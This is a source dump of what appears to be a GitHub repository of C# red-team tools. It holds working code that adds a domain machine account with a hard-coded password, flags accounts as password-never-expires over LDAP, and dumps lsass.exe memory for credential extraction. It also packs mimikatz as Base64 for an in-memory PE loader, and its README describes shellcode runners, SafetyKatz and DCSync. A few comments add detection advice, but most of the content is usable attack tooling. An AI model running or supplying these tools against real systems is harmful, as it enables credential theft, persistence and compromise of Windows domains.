├── AddMachineAccountofDomain.cs ├── Add_passwordneverexpires_user_byLDAP.cs ├── BrailleToASCII.cs ├── DcsyncofMimikatz.cs ├── DumpLsass.cs ├── GzipandBase64.cs ├── ListUserMailbyLDAP.cs ├── List_passwordneverexpires_user_byLDAP.cs ├── Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll ├── Office15-Microsoft.Office.Interop.Outlook.dll ├── PELoaderofMimikatz.cs ├── README.md ├── ReadShellcode.cs ├── SSLCertScan.cs ├── SafetyKatz.cs ├── SerializeXamlToViewState.cs ├── SharpADFindDemo.cs ├── SharpDCSync.cs ├── SharpDCSync_krbtgt.cs ├── SharpExchangeBackdoor.cs ├── SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs ├── SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs ├── SharpExchangeDeserializeShell-NoAuth-ghostfile.cs ├── SharpExchangeDumpHash.cs ├── SharpGetUserLoginIPRPC.cs ├── SharpGetUserLoginIPWMI.cs ├── SharpMimikatz_x64.cs ├── SharpMimikatz_x86.cs ├── SharpPELoaderGenerater.cs ├── SharpSSHCheck_SSH.NET.cs ├── SharpSSHRunCmd_SSH.NET.cs ├── SharpTGTImporter.cs ├── Shellcode.cs ├── ShellcodeBase64.txt ├── SqlClient.cs ├── XamlToViewState.cs └── mapi_tool.cs /AddMachineAccountofDomain.cs: -------------------------------------------------------------------------------- 1 | /* 2 | Reference:https://github.com/pkb1s/SharpAllowedToAct 3 | This code is just part of SharpAllowedToAct. 4 | It can be used to add a Machine Account(User:testNew,Password:123456789). 5 | This code can be complied by csc.exe or Visual Studio. 6 | Supprot .Net 3.5 or later. 
7 | Compile: 8 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll 9 | or 10 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll 11 | Review note: the account name and password are fixed in Main (testNew / 123456789). Defensive view: an ordinary domain user can add computer objects only while ms-DS-MachineAccountQuota allows it, so lowering that quota to 0 and alerting on computer-account creation (Security event 4741) addresses this path. 12 | */ 13 | 14 | 15 | using System; 16 | using System.Text; 17 | using System.DirectoryServices; 18 | using System.Security.AccessControl; 19 | using System.Security.Principal; 20 | 21 | namespace AddMachineAccount 22 | { 23 | class Program 24 | { 25 | static void Main(string[] args) 26 | { 27 | String DomainController = ""; 28 | String Domain = ""; 29 | String MachineAccount = "testNew"; 30 | String DistinguishedName = ""; 31 | String password_cleartext = "123456789"; 32 | // DomainController and Domain are left empty here, so both are resolved from the current domain below. 33 | System.DirectoryServices.ActiveDirectory.Domain current_domain = null; 34 | if (DomainController == String.Empty || Domain == String.Empty) 35 | { 36 | try 37 | { 38 | current_domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain(); 39 | } 40 | catch 41 | { 42 | Console.WriteLine("[!] 
Cannot enumerate domain.\n"); 43 | return; 44 | } 45 | 46 | } 47 | 48 | if (DomainController == String.Empty) 49 | { 50 | DomainController = current_domain.PdcRoleOwner.Name; 51 | } 52 | 53 | if (Domain == String.Empty) 54 | { 55 | Domain = current_domain.Name; 56 | } 57 | 58 | Domain = Domain.ToLower(); 59 | // Keep two forms of the name: machine_account without the trailing '$' and sam_account with it. 60 | String machine_account = MachineAccount; 61 | String sam_account = ""; 62 | if (MachineAccount.EndsWith("$")) 63 | { 64 | sam_account = machine_account; 65 | machine_account = machine_account.Substring(0, machine_account.Length - 1); 66 | } 67 | else 68 | { 69 | sam_account = machine_account + "$"; 70 | } 71 | 72 | 73 | String distinguished_name = DistinguishedName; 74 | String victim_distinguished_name = DistinguishedName; 75 | String[] DC_array = null; 76 | // Build "CN=<name>,CN=Computers,DC=..." from the dotted domain name; victim_distinguished_name is built too but is not read again in this file. 77 | distinguished_name = "CN=" + machine_account + ",CN=Computers"; 78 | DC_array = Domain.Split('.'); 79 | 80 | foreach (String DC in DC_array) 81 | { 82 | distinguished_name += ",DC=" + DC; 83 | victim_distinguished_name += ",DC=" + DC; 84 | } 85 | 86 | Console.WriteLine("[+] Domain = " + Domain); 87 | Console.WriteLine("[+] Domain Controller = " + DomainController); 88 | Console.WriteLine("[+] New SAMAccountName = " + sam_account); 89 | Console.WriteLine("[+] Distinguished Name = " + distinguished_name); 90 | // LDAP on port 389 with signing and sealing requested; Bind() is called without explicit credentials. 91 | System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389); 92 | System.DirectoryServices.Protocols.LdapConnection connection = null; 93 | 94 | connection = new System.DirectoryServices.Protocols.LdapConnection(identifier); 95 | 96 | connection.SessionOptions.Sealing = true; 97 | connection.SessionOptions.Signing = true; 98 | connection.Bind(); 99 | // userAccountControl 4096 (0x1000) is WORKSTATION_TRUST_ACCOUNT; unicodePwd is the double-quoted password as UTF-16LE bytes. 100 | var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] { 101 | new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", 
machine_account +"."+ Domain), 102 | new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account), 103 | new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"), 104 | new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + password_cleartext + "\"")), 105 | new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"), 106 | new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account) 107 | 108 | }); 109 | // Every failure prints the same quota hint; the exception message printed after it is the actual cause. 110 | try 111 | { 112 | connection.SendRequest(request); 113 | Console.WriteLine("[+] Machine account " + machine_account + " added"); 114 | } 115 | catch (System.Exception ex) 116 | { 117 | Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-MachineAccountQuota limit.)"); 118 | Console.WriteLine("[-] Exception: " + ex.Message); 119 | return; 120 | } 121 | 122 | } 123 | 124 | } 125 | } 126 | 127 | 128 | -------------------------------------------------------------------------------- /Add_passwordneverexpires_user_byLDAP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace Add_passwordneverexpires_user_byLDAP 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | Add_passwordneverexpires_user_byLDAP 15 | Use to set the selected user with password_never_expires by LDAP. 
16 | Complie: 17 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 18 | or 19 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 20 | Usage: 21 | Add_passwordneverexpires_user_byLDAP 22 | Eg: 23 | Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1 24 | "; 25 | Console.WriteLine(Usage); 26 | } 27 | // Expects four arguments: LDAP server, bind user, bind password, target sAMAccountName (see the example above). 28 | static void Main(string[] args) 29 | { 30 | if (args.Length != 4) 31 | { 32 | ShowUsage(); 33 | System.Environment.Exit(0); 34 | } 35 | try 36 | { 37 | DirectoryEntry entry = new DirectoryEntry("LDAP://" + args[0], args[1], args[2]); 38 | //When you are in the domain 39 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 40 | // NOTE(review): args[3] is concatenated into the filter unescaped, so LDAP filter metacharacters in it alter the query; FindOne() returns null when nothing matches, which surfaces as the generic error in the catch below. 41 | DirectorySearcher deSearch = new DirectorySearcher(entry); 42 | deSearch.Filter = "(&(&(objectCategory=person)(objectClass=user))(sAMAccountName=" + args[3] + "))"; 43 | deSearch.SearchScope = SearchScope.Subtree; 44 | 45 | SearchResult result = deSearch.FindOne(); 46 | entry = new DirectoryEntry(result.Path, args[1], args[2]); 47 | //When you are in the domain 48 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 49 | // 0x10000 is the ADS_UF_DONT_EXPIRE_PASSWD bit of userAccountControl; it is OR-ed into the current value and committed. 50 | Console.WriteLine("[*] Querying: {0}", deSearch.Filter); 51 | Console.WriteLine("[+] samaccountname: {0}", entry.Properties["samaccountname"][0]); 52 | int NON_EXPIRE_FLAG = 0x10000; 53 | int x = (int)entry.Properties["userAccountControl"].Value; 54 | Console.WriteLine(" userAccountControl: {0}", x); 55 | Console.WriteLine("[*] Trying to set userAccountControl"); 56 | entry.Properties["userAccountControl"].Value = x | NON_EXPIRE_FLAG; 57 | entry.CommitChanges(); 58 | // Read the entry back to print the stored value. Defensive view: this write is an account change (Security event 4738 when account-management auditing is on), and accounts carrying this bit are worth reviewing periodically. 59 | result = deSearch.FindOne(); 60 | entry = new DirectoryEntry(result.Path, args[1], args[2]); 61 | //When you are in the domain 62 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 63 | 64 | int y = 
(int)entry.Properties["userAccountControl"].Value; 65 | Console.WriteLine("[+] samaccountname: {0}", entry.Properties["samaccountname"][0]); 66 | Console.WriteLine(" userAccountControl(new): {0}", y); 67 | } 68 | catch (Exception e) 69 | { 70 | Console.WriteLine("[!] ERROR: {0}", e.Message); 71 | } 72 | } 73 | } 74 | } -------------------------------------------------------------------------------- /BrailleToASCII.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | // Decodes Unicode Braille Patterns to ASCII: StringToUnicode renders each UTF-16 code unit as \uXXXX text, BrailleToASCII maps those tokens to characters. 4 | namespace BrailleToASCII 5 | { 6 | class Program 7 | { 8 | public static string StringToUnicode(string source) 9 | { 10 | var bytes = Encoding.Unicode.GetBytes(source); 11 | var stringBuilder = new StringBuilder(); 12 | for (var i = 0; i < bytes.Length; i += 2) 13 | { 14 | stringBuilder.AppendFormat("\\u{0:x2}{1:x2}", bytes[i + 1], bytes[i]); // the bytes are little-endian, so the high byte (i + 1) is written first 15 | } 16 | return stringBuilder.ToString(); 17 | } 18 | public static string BrailleToASCII(string str) 19 | { 20 | string tempstr = null; // stays null when no token is decoded 21 | string[] arr = str.Split('\\'); 22 | for (int x = 1; x < arr.Length; x++) 23 | { 24 | // "u283c" and "u2820" are prefixes: the token after them selects a digit or an upper-case letter. NOTE(review): x is advanced without a bounds check, so input that ends on a prefix reads past the end of arr. 25 | if (arr[x] == "u283c") 26 | { 27 | x++; 28 | if (arr[x] == "u2801") 29 | tempstr += "1"; 30 | else if (arr[x] == "u2803") 31 | tempstr += "2"; 32 | else if (arr[x] == "u2809") 33 | tempstr += "3"; 34 | else if (arr[x] == "u2819") 35 | tempstr += "4"; 36 | else if (arr[x] == "u2811") 37 | tempstr += "5"; 38 | else if (arr[x] == "u280b") 39 | tempstr += "6"; 40 | else if (arr[x] == "u281b") 41 | tempstr += "7"; 42 | else if (arr[x] == "u2813") 43 | tempstr += "8"; 44 | else if (arr[x] == "u280a") 45 | tempstr += "9"; 46 | else if (arr[x] == "u281a") 47 | tempstr += "0"; 48 | else 49 | Console.WriteLine("[!]Bad character:" + arr[x - 1] + arr[x] + ",index:" + (x-1)); 50 | } 51 | else if (arr[x] == "u2820") 52 | { 53 | x++; 54 | if (arr[x] == "u2801") 55 | tempstr += "A"; 56 | else if (arr[x] == "u2803") 57 | tempstr += "B"; 58 | else if (arr[x] == "u2809") 
59 | tempstr += "C"; 60 | else if (arr[x] == "u2819") 61 | tempstr += "D"; 62 | else if (arr[x] == "u2811") 63 | tempstr += "E"; 64 | else if (arr[x] == "u280b") 65 | tempstr += "F"; 66 | else if (arr[x] == "u281b") 67 | tempstr += "G"; 68 | else if (arr[x] == "u2813") 69 | tempstr += "H"; 70 | else if (arr[x] == "u280a") 71 | tempstr += "I"; 72 | else if (arr[x] == "u281a") 73 | tempstr += "J"; 74 | else if (arr[x] == "u2805") 75 | tempstr += "K"; 76 | else if (arr[x] == "u2807") 77 | tempstr += "L"; 78 | else if (arr[x] == "u280d") 79 | tempstr += "M"; 80 | else if (arr[x] == "u281d") 81 | tempstr += "N"; 82 | else if (arr[x] == "u2815") 83 | tempstr += "O"; 84 | else if (arr[x] == "u280f") 85 | tempstr += "P"; 86 | else if (arr[x] == "u281f") 87 | tempstr += "Q"; 88 | else if (arr[x] == "u2817") 89 | tempstr += "R"; 90 | else if (arr[x] == "u280e") 91 | tempstr += "S"; 92 | else if (arr[x] == "u281e") 93 | tempstr += "T"; 94 | else if (arr[x] == "u2825") 95 | tempstr += "U"; 96 | else if (arr[x] == "u2827") 97 | tempstr += "V"; 98 | else if (arr[x] == "u283a") 99 | tempstr += "W"; 100 | else if (arr[x] == "u282d") 101 | tempstr += "X"; 102 | else if (arr[x] == "u283d") 103 | tempstr += "Y"; 104 | else if (arr[x] == "u2835") 105 | tempstr += "Z"; 106 | else 107 | Console.WriteLine("[!]Bad character:" + arr[x - 1] + arr[x] + ",index:" + (x-1)); 108 | } 109 | else if (arr[x] == "u2801") 110 | tempstr += "a"; 111 | else if (arr[x] == "u2803") 112 | tempstr += "b"; 113 | else if (arr[x] == "u2809") 114 | tempstr += "c"; 115 | else if (arr[x] == "u2819") 116 | tempstr += "d"; 117 | else if (arr[x] == "u2811") 118 | tempstr += "e"; 119 | else if (arr[x] == "u280b") 120 | tempstr += "f"; 121 | else if (arr[x] == "u281b") 122 | tempstr += "g"; 123 | else if (arr[x] == "u2813") 124 | tempstr += "h"; 125 | else if (arr[x] == "u280a") 126 | tempstr += "i"; 127 | else if (arr[x] == "u281a") 128 | tempstr += "j"; 129 | else if (arr[x] == "u2805") 130 | tempstr += "k"; 131 | 
else if (arr[x] == "u2807") 132 | tempstr += "l"; 133 | else if (arr[x] == "u280d") 134 | tempstr += "m"; 135 | else if (arr[x] == "u281d") 136 | tempstr += "n"; 137 | else if (arr[x] == "u2815") 138 | tempstr += "o"; 139 | else if (arr[x] == "u280f") 140 | tempstr += "p"; 141 | else if (arr[x] == "u281f") 142 | tempstr += "q"; 143 | else if (arr[x] == "u2817") 144 | tempstr += "r"; 145 | else if (arr[x] == "u280e") 146 | tempstr += "s"; 147 | else if (arr[x] == "u281e") 148 | tempstr += "t"; 149 | else if (arr[x] == "u2825") 150 | tempstr += "u"; 151 | else if (arr[x] == "u2827") 152 | tempstr += "v"; 153 | else if (arr[x] == "u283a") 154 | tempstr += "w"; 155 | else if (arr[x] == "u282d") 156 | tempstr += "x"; 157 | else if (arr[x] == "u283d") 158 | tempstr += "y"; 159 | else if (arr[x] == "u2835") 160 | tempstr += "z"; 161 | else if (arr[x] == "u2836") 162 | tempstr += ")"; 163 | else if (arr[x] == "u2802") 164 | tempstr += ","; 165 | else if (arr[x] == "u2816") 166 | tempstr += "!"; 167 | else if (arr[x] == "u280c") 168 | tempstr += "/"; 169 | else if (arr[x] == "u2824") 170 | tempstr += "-"; 171 | else if (arr[x] == "u2832") 172 | tempstr += "."; 173 | else if (arr[x] == "u2826") 174 | tempstr += "?"; 175 | else if (arr[x] == "u2806") 176 | tempstr += ";"; 177 | else if (arr[x] == "u2804") 178 | tempstr += "'"; 179 | else if (arr[x] == "u2832") // NOTE(review): unreachable - "u2832" is already matched above and mapped to ".", so "$" is never produced 180 | tempstr += "$"; 181 | else if (arr[x] == "u002b") 182 | tempstr += "+"; 183 | else if (arr[x] == "u003d") 184 | tempstr += "="; 185 | else 186 | Console.WriteLine("[!]Bad character:" + arr[x] + ",index:" + x); 187 | } 188 | return tempstr; 189 | } 190 | 191 | static void Main(string[] args) 192 | { 193 | string str = "⠼⠁⠼⠃⠼⠉⠼⠙⠼⠑⠼⠋⠼⠛⠼⠓⠼⠊⠼⠚⠁⠃⠉⠙⠑⠋⠛⠓⠊⠚⠅⠇⠍⠝⠕⠏⠟⠗⠎⠞⠥⠧⠺⠭⠽⠵⠠⠁⠠⠃⠠⠉⠠⠙⠠⠑⠠⠋⠠⠛⠠⠓⠠⠊⠠⠚⠠⠅⠠⠇⠠⠍⠠⠝⠠⠕⠠⠏⠠⠟⠠⠗⠠⠎⠠⠞⠠⠥⠠⠧⠠⠺⠠⠭⠠⠽⠠⠵⠶⠂⠖⠌⠤⠲⠦⠆⠄⠲"; 194 | string unistr = StringToUnicode(str); 195 | string result = BrailleToASCII(unistr); 196 | Console.WriteLine(result); 197 | 198 | } 199 | } 200 | } 201 | 
-------------------------------------------------------------------------------- /DumpLsass.cs: -------------------------------------------------------------------------------- 1 | //Source:https://github.com/GhostPack/SafetyKatz 2 | //Trimmed copy of that source: it only writes a minidump of lsass.exe (lsass.dmp) to the current directory. 3 | //Defensive note: lsass.exe memory holds credential material, so a handle opened to lsass.exe by a non-system tool, a call into dbghelp!MiniDumpWriteDump, or a new lsass.dmp file are standard detection points (for example Sysmon event 10 targeting lsass.exe); LSA protection (RunAsPPL) and Credential Guard are the usual hardening against this. 4 | using System; 5 | using System.Runtime.InteropServices; 6 | using System.Diagnostics; 7 | using System.IO; 8 | using System.Security.Principal; 9 | 10 | namespace DumpLsass 11 | { 12 | class Program 13 | { 14 | [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)] 15 | static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam); 16 | 17 | public static bool IsHighIntegrity() 18 | { 19 | // Returns true when the current Windows identity is in the built-in Administrators role; the caller treats that as "high integrity". 20 | WindowsIdentity identity = WindowsIdentity.GetCurrent(); 21 | WindowsPrincipal principal = new WindowsPrincipal(identity); 22 | return principal.IsInRole(WindowsBuiltInRole.Administrator); 23 | } 24 | // Writes a minidump of the lsass process to lsass.dmp in the working directory and prints the boolean result of MiniDumpWriteDump. 25 | public static void Minidump() 26 | { 27 | IntPtr targetProcessHandle = IntPtr.Zero; 28 | uint targetProcessId = 0; 29 | 30 | Process targetProcess = null; 31 | 32 | Process[] processes = Process.GetProcessesByName("lsass"); 33 | targetProcess = processes[0]; 34 | 35 | try 36 | { 37 | targetProcessId = (uint)targetProcess.Id; 38 | targetProcessHandle = targetProcess.Handle; 39 | } 40 | catch (Exception ex) 41 | { 42 | Console.WriteLine(String.Format("\n[X] Error getting handle to {0} ({1}): {2}\n", targetProcess.ProcessName, targetProcess.Id, ex.Message)); 43 | return; 44 | } 45 | bool bRet = false; 46 | 47 | string dumpFile = "lsass.dmp"; 48 | 49 | Console.WriteLine(String.Format("\n[*] Dumping {0} ({1}) to {2}", 
targetProcess.ProcessName, targetProcess.Id, dumpFile)); 50 | 51 | using (FileStream fs = new FileStream(dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)) 52 | { 53 | bRet = MiniDumpWriteDump(targetProcessHandle, targetProcessId, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 54 | } 55 | 56 | // bRet is the return value of MiniDumpWriteDump; the failure branch prints only that boolean, not the Win32 error 57 | if (bRet) 58 | { 59 | Console.WriteLine("[+] Dump successful!"); 60 | } 61 | else 62 | { 63 | Console.WriteLine(String.Format("[X] Dump failed: {0}", bRet)); 64 | } 65 | } 66 | static void Main(string[] args) 67 | { 68 | 69 | if (!IsHighIntegrity()) 70 | { 71 | Console.WriteLine("\n[X] Not in high integrity, unable to grab a handle to lsass!\n"); 72 | } 73 | else 74 | { 75 | Minidump(); 76 | 77 | } 78 | } 79 | } 80 | } 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /GzipandBase64.cs: -------------------------------------------------------------------------------- 1 | //Generates the KatzCompressed string used in PELoaderofMimikatz.cs: gzip-compresses a file and writes the result as Base64 text. 2 | //Compile: 3 | //C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs 4 | //or 5 | //C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs 6 | using System; 7 | using System.IO; 8 | using System.IO.Compression; 9 | namespace GzipandBase64 10 | { 11 | class Program 12 | { 13 | static byte[] Compress(byte[] raw) 14 | { 15 | using (MemoryStream memory = new MemoryStream()) 16 | { 17 | using (GZipStream gzip = new GZipStream(memory, 18 | CompressionMode.Compress, true)) 19 | { 20 | gzip.Write(raw, 0, raw.Length); 21 | } // disposing the GZipStream finishes the gzip stream; leaveOpen (true) keeps memory readable for ToArray() 22 | return memory.ToArray(); 23 | } 24 | } 25 | static void Main(string[] args) 26 | { 27 | byte[] AsBytes = File.ReadAllBytes(@"mimikatz.exe"); 28 | byte[] compress = Compress(AsBytes); 29 | // Input and output paths are fixed and relative to the working directory. 30 | String AsBase64String = Convert.ToBase64String(compress); 31 | StreamWriter sw = new StreamWriter(@"base64.txt"); 32 | sw.Write(AsBase64String); 33 | sw.Close(); 34 | } 35 | } 36 | } 37 | 
-------------------------------------------------------------------------------- /ListUserMailbyLDAP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace ListUserMailbyLDAP 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | GetMailbyLDAP 15 | Use to export all users' mail by LDAP. 16 | Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs 17 | Complie: 18 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 19 | or 20 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 21 | Usage: 22 | ListUserMailbyLDAP 23 | Eg: 24 | ListUserMailbyLDAP.exe 192.168.1.1 test1 password1 25 | "; 26 | Console.WriteLine(Usage); 27 | } 28 | 29 | // Expects three arguments: LDAP server, user, password. Prints sAMAccountName, mail (when present), whenCreated, pwdLastSet, accountExpires and lastLogon for every entry matching the filter. 30 | static void Main(string[] args) 31 | { 32 | if (args.Length != 3) 33 | { 34 | ShowUsage(); 35 | System.Environment.Exit(0); 36 | } 37 | try 38 | { 39 | string q = "(&(objectCategory=User))"; 40 | Console.WriteLine("[*] Querying LDAP://{0}", args[0]); 41 | Console.WriteLine("[*] Querying: {0}", q); 42 | DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0],args[1],args[2]); 43 | DirectorySearcher ds = new DirectorySearcher(de); 44 | ds.Filter = q; 45 | foreach (SearchResult r in ds.FindAll()) // NOTE(review): only "mail" is checked for presence; [0] on any other attribute that is missing throws, and the catch around the loop then ends the listing 46 | { 47 | Console.WriteLine("User:" + r.Properties["samaccountname"][0]); 48 | if(r.Properties["mail"].Count > 0) 49 | Console.WriteLine("Mail:" + r.Properties["mail"][0]); 50 | Console.WriteLine("whencreated:" + r.Properties["whencreated"][0]); 51 | Console.WriteLine("pwdlastset:" + r.Properties["pwdlastset"][0]); 52 | if(r.Properties["accountexpires"][0].ToString()== "9223372036854775807") // Int64.MaxValue is reported as "never expires" 53 | Console.WriteLine("accountexpires:Never"); 54 | else 55 | 
Console.WriteLine("accountexpires:" + r.Properties["accountexpires"][0]); 56 | Console.WriteLine("lastlogon:" + r.Properties["lastlogon"][0]); 57 | Console.WriteLine("---"); 58 | } 59 | } 60 | catch (Exception e) 61 | { 62 | Console.WriteLine("[!] ERROR: {0}", e.Message); 63 | } 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /List_passwordneverexpires_user_byLDAP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.DirectoryServices; 6 | 7 | namespace List_passwordneverexpires_user_byLDAP 8 | { 9 | class Program 10 | { 11 | static void ShowUsage() 12 | { 13 | string Usage = @" 14 | List_passwordneverexpires_user_byLDAP 15 | Use to export all users with password_never_expires by LDAP. 16 | Complie: 17 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 18 | or 19 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 20 | Usage: 21 | List_passwordneverexpires_user_byLDAP 22 | Eg: 23 | List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1 24 | "; 25 | Console.WriteLine(Usage); 26 | } 27 | 28 | // Expects three arguments: LDAP server, user, password. Prints the sAMAccountName of every matched entry whose userAccountControl has bit 0x10000 (ADS_UF_DONT_EXPIRE_PASSWD) set; the same listing serves as an audit of accounts exempt from password expiry. 29 | static void Main(string[] args) 30 | { 31 | if (args.Length != 3) 32 | { 33 | ShowUsage(); 34 | System.Environment.Exit(0); 35 | } 36 | try 37 | { 38 | string q = "(&(objectCategory=User))"; 39 | Console.WriteLine("[*] Querying LDAP://{0}", args[0]); 40 | Console.WriteLine("[*] Querying: {0}", q); 41 | DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0],args[1],args[2]); 42 | //When you are in the domain 43 | //DirectoryEntry de = new DirectoryEntry("LDAP://" + args[0]); 44 | DirectorySearcher ds = new DirectorySearcher(de); 45 | ds.Filter = q; 46 | Console.WriteLine("[*] Export all users with 
password_never_expires"); 47 | foreach (SearchResult r in ds.FindAll()) 48 | { 49 | int x = Convert.ToInt32(r.Properties["useraccountcontrol"][0]); 50 | if((x & 0x10000) == 0x10000) 51 | Console.WriteLine(r.Properties["samaccountname"][0]); 52 | } 53 | } 54 | catch (Exception e) 55 | { 56 | Console.WriteLine("[!] ERROR: {0}", e.Message); 57 | } 58 | } 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/Homework-of-C-Sharp/6ab29ba191b8f5028138d11dcc84998e495c76f8/Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll -------------------------------------------------------------------------------- /Office15-Microsoft.Office.Interop.Outlook.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/Homework-of-C-Sharp/6ab29ba191b8f5028138d11dcc84998e495c76f8/Office15-Microsoft.Office.Interop.Outlook.dll -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Homework-of-C-Sharp 2 | C Sharp codes of my blog. 3 | 4 | --- 5 | 6 | ### Shellcode.cs 7 | 8 | Use CreateThread to run shellcode. 9 | 10 | ### ShellcodeBase64.txt 11 | 12 | Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp) 13 | 14 | ### ReadShellcode.cs 15 | 16 | It will read ShellcodeBase64.txt and launch the shellcode. 17 | 18 | --- 19 | 20 | ### DumpLsass.cs 21 | 22 | Source code is https://github.com/GhostPack/SafetyKatz 23 | 24 | Remove some functions of the source code,only used of dumping lsass.exe to the current path. 
25 | 26 | Compile: 27 | 28 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs` 29 | 30 | or 31 | 32 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs` 33 | 34 | 35 | ### SafetyKatz.cs 36 | 37 | Used to run `sekurlsa::logonpasswords` and `sekurlsa::ekeys` on the minidump file of lsass.exe. 38 | 39 | All code from https://github.com/GhostPack/SafetyKatz 40 | 41 | I just modified a few lines of code so that it can be compiled by csc.exe. 42 | 43 | Eg. 44 | 45 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe` 46 | 47 | or 48 | 49 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe` 50 | 51 | --- 52 | 53 | ### GzipandBase64.cs 54 | 55 | Used to generate the KatzCompressed string in PELoaderofMimikatz.cs 56 | 57 | Compile: 58 | 59 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs` 60 | 61 | or 62 | 63 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs` 64 | 65 | ### PELoaderofMimikatz.cs 66 | 67 | The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48). 68 | 69 | I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14). 70 | 71 | The source code supports .NET 4.0 or later. 72 | 73 | This code supports .NET 3.5 or later. 74 | 75 | Compile: 76 | 77 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs` 78 | 79 | or 80 | 81 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs` 82 | 83 | ### DcsyncofMimikatz.cs 84 | 85 | This is the dcsync mode extracted from Mimikatz. 86 | 87 | The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip 88 | 89 | You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string. 90 | 91 | The source code supports .NET 4.0 or later. 
